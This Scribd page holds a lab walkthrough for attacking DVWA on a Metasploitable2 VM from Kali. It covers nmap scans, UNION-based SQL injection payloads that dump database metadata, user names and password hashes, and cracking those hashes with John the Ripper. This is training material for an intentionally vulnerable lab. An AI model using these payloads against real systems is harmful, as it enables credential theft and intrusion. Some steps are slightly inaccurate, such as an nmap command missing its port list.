Scribd
Upload
34 views16 pages

Damnvwapp Erica

This document provides instructions for accessing a Damn Vulnerable Web Application (DVWA) using Kali Linux and Metasploitable2 virtual machines. It demonstrates various SQL injection techniques on the DVWA platform, including retrieving the database version, user, and table names. It also shows how to extract username and password hash values and crack them using John the Ripper.

Uploaded by

AngeLo GonzaLes Omania
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
34 views16 pages

Damnvwapp Erica

This document provides instructions for accessing a Damn Vulnerable Web Application (DVWA) using Kali Linux and Metasploitable2 virtual machines. It demonstrates various SQL injection techniques on the DVWA platform, including retrieving the database version, user, and table names. It also shows how to extract username and password hash values and crack them using John the Ripper.

Uploaded by

AngeLo GonzaLes Omania
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

Damn Vulnerable Web App (DVWA)

{ Manual SQL Injection, John the Ripper }


Section 1: Login to Kali Linux

1. Start Kali VM Instance


o Instructions:
0. Start Up Oracle VM VirtualBox
Manager 1. Select Kali VM
2. Start the virtual machine

2. Login to Kali VM
o Instructions:
0. Login: kali
1. Password: kali
Section 2: Login to Metasploitable2

1. Start Metasploitable2 VM Instance


o Instructions:
0. Select Metasploitable2 VM
1. Start the virtual machine

2. Login to Metasploitable2 VM
o Instructions:
0. Login: msfadmin
1. Password: msfadmin

Section 3: Open Kali VM Root Terminal and Retrieve IP Address

1. Open a Root terminal


o Instructions:
0. Click on the Root terminal
1. Password: kali
2. Get IP Address
o Instructions:
0. ifconfig

Section 4: Retrieve IP Address of Metasploitable2

1. Get IP Address
o Instructions:
0. ifconfig
Section 5: Discover hosts on the network by using nmap.

1. Discover hosts using nmap


o Instructions:
0. nmap -sn 192.168.100.0/24

Section 6: Perform a port scan to Metasploitable2.

1. Port scan Metasploitable2


o Instructions:
0. nmap -p 192.168.100.92
Section 7: Access and Login to DVWA.

1. Open Firefox and go to Metasploitable2


o Instructions:
0. On the url type: 192.168.100.92

2. Login to DVWA
o Instructions:
0. Click DVWA
1. Login: admin
2. Password: password
3. Click on Login
Section 8: Set Security Level

1. Set DVWA Security Level


o Instructions:
0. Click on DVWA Security, in the left hand menu.
1. Select "low"
2. Click Submit
Section 9: Manual SQL Injection

1. SQL Injection Menu


o Instructions:
0. Select "SQL Injection" from the left navigation menu.

2. Basic Injection
o Instructions:
0. Input "1" into the text box.
1. Click Submit.
2. Note, webpage/code is supposed to print ID, First name,
and Surname to the screen.
3. Always True Scenario
o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' or '0'='0
1. Click Submit

4. Display Database Version


o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' or 0=0 union select null, version() #
1. Click Submit
5. Display Database User
o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' or 0=0 union select null, user() #

6. Display Database Name


o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' or 0=0 union select null, database() #
7. Display all tables in information_schema
o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' and 1=0 union select null, table_name from
information_schema.tables #
1. Click Submit
.
8. Display all the user tables in information_schema
o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
1. Click Submit
9. Display all the columns fields in the information_schema user table
o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name =
'users' #
1. Click Submit

10. Display all the columns field contents in the information_schema


user table
o Instructions:
0. Input the below text into the User ID Textbox (See Picture).
▪ %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users
#
1. Click Submit

Section 10: Create Password Hash File

1. Create Password Hash File


o Instructions:
0. Highlight both admin and the password hash
1. Right Click
2. Copy

2. Open Simple Text Editor


o Instructions:
0. Applications --> Wine --> Programs --> Accessories -->
Notepad
3. Paste in Simple Text Editor
o Instructions:
0. Edit --> Paste
4. Format in Text Editor
o Instructions:
0. Place a ":" immediately after admin
1. Make sure your cursor is immediately after the ":" and hit
the delete button.
2. Now you should see the user admin and the password hash
separated by a ":" on the same line.
3. Cut the username and password combinations for gordonb,
1337, pablo, and smitty from (Section 11, Step 1) and paste
in this file as well.
5. Save in Text Editor
o Instructions:
0. Navigate to --> /home/Documents
1. Name the file name --> dvwa_password.txt
2. Click Save
Section 11: Proof of Lab Using John the Ripper

1. Proof of Lab
o Instructions:
0. Bring up a new root terminal
1. cd ~
2. cd /home/kali/Documents
3. john --format=raw-MD5 dvwa_password.txt
4. john --show --format=RAW-MD5 dvwa_password.txt

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy